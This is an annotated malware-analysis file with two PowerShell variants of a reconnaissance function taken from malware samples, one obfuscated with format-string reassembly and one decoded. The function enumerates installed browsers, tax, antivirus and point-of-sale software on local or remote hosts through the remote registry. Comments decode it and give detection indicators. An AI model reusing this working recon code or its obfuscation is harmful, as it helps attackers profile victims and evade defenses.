# From "LNK file" malware — obfuscated variant: every string literal is reassembled with the -f format operator, and the token "XRg" (built as [ChAR]88+[ChAR]82+[ChAR]103) is a placeholder replaced by "|" to form the regex alternation
function Get-Soft {
# Software-inventory reconnaissance. For each target host it opens HKLM over
# the remote registry API, walks both Uninstall hives (native and Wow6432Node),
# reads each entry's DisplayName and emits the ones matching $NameRegex.
#
# Obfuscation in this variant: all literals ('LocalMachine', 'DisplayName',
# '\Wow6432Node', the regex) are split into fragments and reassembled with -f;
# "XRg" stands in for the regex alternation "|". Decoded, $NameRegex is
#   (Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS)
# i.e. browsers, tax-preparation products, security software and point-of-sale
# software — it profiles the victim and its defenses before further action.
#
# Detection notes: the -f / [ChAR] reassembly pattern, the REpLace-to-"|" step
# and the ...\CurrentVersion\Uninstall path are good script-block-logging
# indicators. OpenRemoteBaseKey against a non-local $comp relies on the
# RemoteRegistry service and privileges on that host; failures are swallowed.
param (
# Hosts to query; defaults to the local machine. NOTE(review): the function
# body has no process{} block, so when input arrives via the pipeline only the
# last object is seen — verify if reproducing the sample's behaviour.
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
# Pattern applied to each DisplayName with -match (case-insensitive by default).
# The format string below is decoded in the header comment.
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
)
foreach ($comp in $ComputerName) {
# Two Uninstall views: '' (SOFTWARE\...) and '\Wow6432Node' (32-bit software
# on 64-bit Windows). The inner -f yields '{0}Wow6432Node'; the outer -f fills
# {0} with [char]92, the backslash.
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
foreach ($key in $keys) {
try {
# 'LocalMa'+'c'+'hine' = 'LocalMachine' (HKLM). Any error — host unreachable,
# access denied, hive absent — is swallowed and this view is skipped silently.
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{0}{1}{2}" -f 'LocalMa','c','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
continue
}
foreach ($app in $apps) {
# Re-opens the remote base key for every entry; none of the RegistryKey
# handles opened here are closed or disposed.
# 'Loc'+'alMac'+'hine' = 'LocalMachine'.
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{1}{0}{2}" -f'alMac','Loc','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
# 'Displ'+'ayN'+'ame' = 'DisplayName'.
$name = $program.GetValue(("{0}{2}{1}" -f'Displ','ame','ayN'))
# $str is reset on every iteration, so the += below never accumulates: each
# match is written to the pipeline on its own as "<DisplayName>;".
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}
# From "log file" malware — the same routine as Get-Soft above with the string obfuscation removed (the decoded literals and regex are identical); only the function and variable names are randomized
function gic-jadkdp {
# Software-inventory reconnaissance, de-obfuscated form of Get-Soft: for each
# target host, open HKLM over the remote registry API, walk both Uninstall
# hives (native and Wow6432Node) and emit every DisplayName matching
# $NameRegex. The targets — browsers (Opera/Firefox/Chrome), tax-preparation
# software (TAX/OLT/LACERTE/PROSERIES), security products and point-of-sale
# software — profile the victim and its defenses.
#
# The function name and the $gibqokxyxbupwcsrtuvm_41nhwrp* variables are
# randomized-looking identifiers, a weaker obfuscation than the -f string
# reassembly seen in the other variant. Detection notes: the literal
# 'LocalMachine' / 'DisplayName' / '\Wow6432Node' strings together with
# OpenRemoteBaseKey and the ...\CurrentVersion\Uninstall path are the
# indicators here; remote access needs the RemoteRegistry service and
# privileges on $comp, and all failures are swallowed.
param (
# Hosts to query; defaults to the local machine. NOTE(review): no process{}
# block, so pipeline input delivers only the last object to the body.
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
# Applied to each DisplayName with -match (case-insensitive by default).
# "Secury" is presumably a misspelling of "Security" and "Kasper" a prefix of
# "Kaspersky" — as written, they match what they match.
[string]$NameRegex = '(Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS)'
)
foreach ($comp in $ComputerName) {
# Two Uninstall views: '' (SOFTWARE\...) and '\Wow6432Node' (32-bit software
# on 64-bit Windows).
$gibqokxyxbupwcsrtuvm_41nhwrps = '','\Wow6432Node'
foreach ($gibqokxyxbupwcsrtuvm_41nhwrp in $gibqokxyxbupwcsrtuvm_41nhwrps) {
try {
# Any error — host unreachable, access denied, hive absent — is swallowed and
# this view is skipped silently.
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
continue
}
foreach ($app in $apps) {
# Re-opens the remote base key for every entry; none of the RegistryKey
# handles opened here are closed or disposed.
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall\$app")
$name = $program.GetValue('DisplayName')
# $str is reset on every iteration, so the += below never accumulates: each
# match is written to the pipeline on its own as "<DisplayName>;".
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}